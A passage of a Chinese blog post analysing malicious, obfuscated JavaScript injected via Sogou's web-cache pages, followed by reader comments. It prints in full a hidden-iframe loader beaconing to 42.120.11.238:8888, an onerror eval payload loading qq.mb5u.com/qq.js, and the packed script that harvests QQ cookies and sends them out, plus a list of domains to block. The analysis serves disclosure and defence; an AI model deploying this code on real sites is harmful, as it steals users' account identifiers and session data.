F\x66″,"\x64\x6F\x6D\x61\x69\x6E","\x71\x71\x63\x68\x61\x74\x35\x75\x28\x31\x29″,"\x32″,"\x71\x71\x63\x68\x61\x74\x35\x75\x28\x29″];var mb5u_oHead=document[_0xc112[2]](_0xc112[1])[_0xc112[0]](0);var mb5ux=0;var mb5uy=0;var mb5u_iframe_hover=false;var i_referrer=encodeURIComponent(document[_0xc112[3]]);var i_url=encodeURIComponent(document[_0xc112[5]][_0xc112[4]]);var i_title=encodeURIComponent(document[_0xc112[6]]);function Creatif5u(b,c){var a=document[_0xc112[8]](_0xc112[7]);a[_0xc112[9]]=b;if(c!=_0xc112[10]&&c!=null){a[_0xc112[11]]=c};a[_0xc112[13]][_0xc112[12]]=_0xc112[14];a[_0xc112[15]]=_0xc112[16];a[_0xc112[19]](_0xc112[17],_0xc112[18],0);mb5u_oHead[_0xc112[20]](a)}function Creatjs5u(b,c){var a=document[_0xc112[8]](_0xc112[21]);a[_0xc112[22]]=_0xc112[23];if(c!=_0xc112[10]&&c!=null){a[_0xc112[11]]=c};a[_0xc112[24]]=_0xc112[25];a[_0xc112[9]]=b;mb5u_oHead[_0xc112[20]](a)}function Creatif5ubody(b,c){var a=document[_0xc112[8]](_0xc112[7]);a[_0xc112[9]]=b;if(c!=_0xc112[10]&&c!=null){a[_0xc112[11]]=c};a[_0xc112[13]][_0xc112[12]]=_0xc112[14];a[_0xc112[15]]=_0xc112[16];a[_0xc112[19]](_0xc112[17],_0xc112[18],0);document[_0xc112[2]](_0xc112[26])[_0xc112[0]](0)[_0xc112[20]](a)}function Gc5u(a){var b,reg=new RegExp(_0xc112[27]+a+_0xc112[28]);if(b=document[_0xc112[30]][_0xc112[29]](reg)){return unescape(b[2])}else{return null}}function Sc5u(a,b){var c=new Date();c[_0xc112[32]](c[_0xc112[31]]()+2*24*60*60*1000);document[_0xc112[30]]=a+_0xc112[33]+escape(b)+_0xc112[34]+c[_0xc112[35]]()}function Q5u(){var a=i_php+_0xc112[36]+i_uid+_0xc112[37]+i_qz+_0xc112[38]+i_time+_0xc112[39]+i_referrer+_0xc112[40]+i_url+_0xc112[41]+i_title+_0xc112[42]+(new Date())[_0xc112[31]]();Creatjs5u(a,_0xc112[43])}function Umb5u(){var a=i_php+_0xc112[44]+i_uid+_0xc112[45]+i_referrer+_0xc112[46]+i_url+_0xc112[41]+i_title+_0xc112[47]+i_fkid+_0xc112[48]+(new Date())[_0xc112[31]]();Creatif5u(a)}function mb5u_noLogin(){var a=i_php+_0xc112[49]+i_fkid+_0xc112[50]+(new Date)[_0xc112[31]]();Creatjs5u(a);setTimeout(ck5u,500)}function ck5u(){if(wdl==_0xc112[51]){if(!navigator[_0xc112[52]][_0xc112[29]](/(iPhone|iPod|Android|ios)/i)){if(Gc5u(_0xc112[53])==null){ptU5u()}}}}function ptU5u(){window[_0xc112[54]]=_0xc112[55];var a=document[_0xc112[8]](_0xc112[7]);a[_0xc112[9]]=_0xc112[56];a[_0xc112[11]]=_0xc112[54];a[_0xc112[13]][_0xc112[12]]=_0xc112[57];a[_0xc112[15]]=_0xc112[16];a[_0xc112[58]]=_0xc112[59];a[_0xc112[19]](_0xc112[17],_0xc112[18],0);var b=document[_0xc112[61]][_0xc112[60]];document[_0xc112[61]][_0xc112[62]](a,b)}function mb5u_GetCurrentStyle(a,b){if(a[_0xc112[63]]){return a[_0xc112[63]][b]}else{if(window[_0xc112[64]]){propprop=b[_0xc112[66]](/([A-Z])/g,_0xc112[65]);propprop=b[_0xc112[67]]();return document[_0xc112[68]][_0xc112[64]](a,null)[propprop]}};return null}window[_0xc112[69]]=function(){var h=document[_0xc112[70]](_0xc112[54]);mb5u_iframeClick(h,mb5uiframeclickcallback);document[_0xc112[71]]=function(a){mb5u_iframe_hover=false;window[_0xc112[72]]();var b=document[_0xc112[70]](_0xc112[54]);var a=a||window[_0xc112[73]];mb5ux=a[_0xc112[74]];mb5ux=a[_0xc112[75]];var c=document[_0xc112[61]][_0xc112[76]]+document[_0xc112[77]][_0xc112[76]];var d=document[_0xc112[77]][_0xc112[78]]-a[_0xc112[74]];var e=document[_0xc112[61]][_0xc112[79]]+document[_0xc112[77]][_0xc112[79]];var f=0;var g=mb5u_GetCurrentStyle(document[_0xc112[61]],_0xc112[80]);if(document[_0xc112[77]][_0xc112[81]]>document[_0xc112[61]][_0xc112[81]]&&g==_0xc112[82]){f=(document[_0xc112[77]][_0xc112[81]]-document[_0xc112[61]][_0xc112[81]])/2;f=f+e;b[_0xc112[13]][_0xc112[83]]=(c+a[_0xc112[75]]-25)+_0xc112[84];b[_0xc112[13]][_0xc112[85]]=((d<b[_0xc112[78]]?a[_0xc112[74]]-b[_0xc112[78]]:a[_0xc112[74]])-f)+_0xc112[84]}else{f=f+e;b[_0xc112[13]][_0xc112[83]]=(c+a[_0xc112[75]]-25)+_0xc112[84];b[_0xc112[13]][_0xc112[85]]=((d<b[_0xc112[78]]?a[_0xc112[74]]-b[_0xc112[78]]:a[_0xc112[74]])+f)+_0xc112[84]}}};function mb5u_iframeClick(a,b){a[_0xc112[86]]=function(){mb5u_iframe_hover=true};a[_0xc112[87]]=function(){mb5u_iframe_hover=false};window[_0xc112[88]]=function(){if(mb5u_iframe_hover){b()}}}function mb5uiframeclickcallback(){var b=document[_0xc112[70]](_0xc112[54]);setTimeout(function(){try{b[_0xc112[13]][_0xc112[89]]=_0xc112[90];var a=document[_0xc112[91]](mb5ux,mb5uy);a[_0xc112[92]]()}catch(e){b[_0xc112[13]][_0xc112[89]]=_0xc112[90]};Umb5u();Sc5u(_0xc112[53],_0xc112[93])},1000)}function qqchat5u(i){if(i==1){var a=_0xc112[94]+i_qq+_0xc112[95]+i_d+_0xc112[96];Creatif5ubody(a,_0xc112[97])}else{Creatjs5u(_0xc112[98]+i_qq+_0xc112[99],_0xc112[100])}}function JSONP_CALLBACK_5u(a){var b=a[_0xc112[102]][_0xc112[101]];Creatjs5u(_0xc112[103]+i_qq+_0xc112[104]+b+_0xc112[105]+i_url+_0xc112[41]+i_title+_0xc112[106],_0xc112[100])}function bizqqkey5u(a){var b=a[_0xc112[102]][_0xc112[109]][_0xc112[66]](_0xc112[107],_0xc112[108]);b=b[_0xc112[66]](_0xc112[110],_0xc112[110]);Creatif5ubody(b,_0xc112[111])}if(document[_0xc112[113]][_0xc112[112]](i_d)>=0){Umb5u();setTimeout(mb5u_noLogin,1500);if(i_h==_0xc112[93]){setTimeout(_0xc112[114],i_yc)};if(i_h==_0xc112[115]){setTimeout(_0xc112[116],i_yc)}};

为了保留原意,所以全部贴出来了。可是这一步得到的还是混淆过的,我们要继续反混淆。其实反混淆这事儿挺苦逼的,因为需要自己写脚本。话说这个混淆的方式怎么这么眼熟呢,OpenGG同学以前也这么干过。

最终反混淆的代码如下,都已经格式化了。

这个代码有点长,但我们其实不用关心那么多。在这其中,我们看到大量的隐藏iframe操作,可见插入了不少iframe。插到哪里去了?喏。

qq_webcache_xss_6

在这JS中我们甚至能看到直接调用企鹅的登录浮窗的界面……禁不住要问一下,这货到底是要干嘛啊?

不过我们并没有看到企鹅的登录浮窗(因为我曾经在浏览器中登录的关系?没登录是不是就会自动弹了?只是猜测,没有做深入研究,这不是重点)。

从上面一段脚本的最后我们看到了Umb5u()mb5u_noLogin两个函数调用,看了看觉得前面一个比较重要,因为它嵌入了一个带有资源返回的iframe:http://42.120.11.238:8888//sx.php?uid=5867&ref=&furl=http%3A%2F%2Fwww.zxdl369.cn%2Fonlineshop%2Ffojiaoyongpin%2Ftongzhutai%2F&title=%E4%BA%A7%E5%93%81%E5%B1%95%E5%8E%85%E2%80%94%E6%89%8E%E8%A5%BF%E5%BE%B7%E5%8B%92&fkid=1416369920&tm=1431411413183

PS,sx.php原意是傻Ⅹ.拍黄片儿的意思吗?

qq_webcache_xss_7

看!混入了奇怪的东西耶!有狗出没!!

3.猪一样的搜狗

嗯,可惜搜狗和腾讯的关系很紧密,所以你看我都没登录过搜狗,却依然在搜狗下面留下了Cookies信息,腾讯擅长把会话密钥啊QQ号啊之类的东西写在Cookies里,所以很多人喜欢XSS这些信息。这不,其实是搜狗搞的。

上面访问的网址是搜狗的网页快照服务,看到这个我就闻到了XSS的味道……

qq_webcache_xss_8

 

看看这个页面的源码吧,直接拉到最下面。

qq_webcache_xss_10

看到那个img标签没?嗯。这里构造了一个不存在的img地址,然后使用onerror来触发它。

onerror的内容如下。

/*_Ka*/var/*hCnn*/IHse/*Wav*/=/*fBJAp*/\u0053\u0074\u0072\u0069\u006e\u0067./*lsxIcC*/\u0066\u0072\u006f\u006d\u0043\u0068\u0061\u0072\u0043\u006f\u0064\u0065;/*ksHMx*/var/*KuVkYP*/NWVbw_QY/*_ztkzYy*/=/*_pNZE*/\u0065\u0076\u0061\u006c;NWVbw_QY(IHse(118,97,114,32,111,72,101,97,100,61,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,72,69,65,68,39,41,46,105,116,101,109,40,48,41,59,118,97,114,32,111,83,99,114,105,112,116,61,32,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,59,111,83,99,114,105,112,116,46,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,59,111,83,99,114,105,112,116,46,115,114,99,61,34,104,116,116,112,58,47,47,113,113,46,109,98,53,117,46,99,111,109,47,113,113,46,106,115,34,59,111,72,101,97,100,46,97,112,112,101,110,100,67,104,105,108,100,40,111,83,99,114,105,112,116,41,59));"

好嘛,又混淆了,别以为我不知道你想干坏事。真相是啥呢?

var oHead=document.getElementsByTagName('HEAD').item(0);var oScript= document.createElement("script");oScript.type="text/javascript";oScript.src="http://qq.mb5u.com/qq.js";oHead.appendChild(oScript);

原来是又嵌入了一个脚本引用。这个qq.js内容是啥呢?

eval(function(p,a,c,k,e,r){e=function(c){return(c<a?":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!".replace(/^/,String)){while(c–)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c–)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('l 4(a){3 b,T=Y 1y("(^| )"+a+"=([^;]*)(;|$)");h(b=9.12.13(T))n 1q(b[2]);D n A}l 6(a){3 b=9.14.15;3 c=b.1k(b.C("?")+1).1w("&");j(3 i=0;i<c.p;i++){3 d=c[i].C(a+"=");h(d!=-1){n c[i].z(a+"=","").z("?","");17}}n""}l Q(a){3 b=6(\'R\');3 c=6(\'1u\');3 d=6(\'1v\');3 e=6(\'S\');3 f="U://V.X.11.Z:10/?1a=1c";f+="&1e="+a;f+="&R="+b;f+="&1g="+c;f+="&1i="+d;f+="&S="+e;f+="&r="+(Y 1m()).1o();3 g=9.E("F");g.G="H/I";g.J=f;9.K(\'L\').M(0).N(g)}l O(b){3 a=9.E("F");a.G="H/I";a.18="19-8″;a.J=b;9.K(\'L\').M(0).N(a)}3 s=4("1b");3 x=4("1d");3 t=4("1f");3 u=4("1h");3 v=4("1j");3 w=4("1l");3 q=4("1n");3 y=4("1p");3 W=s||x||t||u||v||w||q||y;h(W==A){O("U://V.X.11.Z:10/m/1r.1s?c="+6(\'1t\')+"&d=1″)}D{3 k=[s,x,t,u,v,w,q,y];3 5=[];3 7=[];3 B={};j(3 i=0;i<k.p;i++){h(k[i]!=A){3 a=k[i].z(/^[o|0]*/1x,"");5.P(a)}}j(3 i=0;i<5.p;i++){h(!B[5[i]]){B[5[i]]=1z;h(1A(5[i])>1B){7.P(5[i])}}}7=7.16();j(3 i=0;i<7.p;i++){Q(7[i])}}',62,100,'|||var|Gc5u|buin|Re5u|cuin||document||||||||if||for|auin|function||return||length|u7||u1|u3|u4|u5|u6|u2|u8|replace|null|uq|indexOf|else|createElement|script|type|text|javascript|src|getElementsByTagName|HEAD|item|appendChild|Creatjs5u|push|Q5u|uid|title|reg|http|42|quin|120|new|238|8888||cookie|match|location|href|reverse|break|charset|utf|action|pt2gguin|saveQQ|o_cookie|qq|p_uin|referrer|uin|url|ptui_loginuin|substring|uin_cookie|Date|luin|getTime|qm_username|unescape|wdl|php|fkid|ref|furl|split|ig|RegExp|true|parseInt|10051′.split('|'),0,{}))

咳咳……你以为这样有用吗,图样图森破。

这段脚本很简单,枚举了各个可能的Cookies,如果找到了,就发回去。于是就看到了如下的这个请求。

qq_webcache_xss_9

奇怪,我都没打开过搜狗,为什么搜狗会有Cookies?那谁知道呢,企鹅和搜狗是那么好的基友,交叉感染司空见惯。

所以,我的QQ号就出去咯。

4.解决

搜狗的问题,当然要搜狗来解决咯。

在他们搞这个事儿之前,我先把那几个奇奇怪怪的域名全部ban掉再说。

  • 42.120.11.238:8888
  • qq.mb5u.com

Chrome/Firefox上可以使用Adblock Plus来阻断这些请求,IE上可以使用跟踪保护来阻断这些请求。

5.后记

我正准备把这个当漏洞提交到乌云的时候,搜索了下发现早在去年七月就已经有人提交了:http://www.wooyun.org/bugs/wooyun-2010-069640

然后搜狗的反应是:主!动!选!择!忽!略!!

天啊……看到这态度,我立马ban掉了搜狗的域名,不负责任的运营商分分钟给我滚粗!

喜欢 (43)or分享 (0)
发表我的评论
取消评论
表情

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
(16)个小伙伴在吐槽
  1. 虽然没看懂,但是感觉很牛逼的样子

    笑筱笑2015-12-23 01:38 回复
  2. 啊啊,一不小心就看到这个XSS了。之前也发现了这个,不过没鱼大分析的全面啊~

    Kvkens2015-10-01 22:02 回复
  3. 打开这个网站后,竟然不给我发广告邮件:-x

    SaltC2015-08-20 07:54 回复
    • 不知道是不是屏蔽了。

      木魚2015-08-21 00:51 回复
  4. 木鱼大人,谢谢你花费这么多时间为我们解惑,然后我一个也没看懂,只能默默飘过!

    6352966632015-08-12 13:46 回复
    • = =# 。。。飘过还这么用心

      木魚2015-08-12 18:37 回复
  5. 也许作者就是从被忽略的乌云中挖的矿啊~

    Sigma2015-05-12 22:33 回复
    • 不是的。。你仔细看看乌云漏洞报告里的例子,其实就是这个网站

      木魚2015-05-12 22:42 回复
  6. 会打dota的大神好牛逼8-) "咳咳"反混淆技能好强大,我也要搜搜学学

    xiayudashan2015-05-12 17:28 回复
    • 晚些时候我可以写一个小的博客来解释如何反混淆

      木魚2015-05-12 19:54 回复
      • 灰常期待^ω^啊啊啊

        xiayudashan2015-05-12 20:12 回复
  7. 最想要的是两次的反混淆.好高深的样子

    tanranran2015-05-12 17:17 回复
    • 这个。。晚些时候我可以写一个小的博客来解释如何反混淆

      木魚2015-05-12 19:53 回复
  8. 有一个技术牛逼的朋友真好

    0002015-05-12 17:07 回复
  9. 反正我没看懂。。。

    爱你的小八。2015-05-12 16:07 回复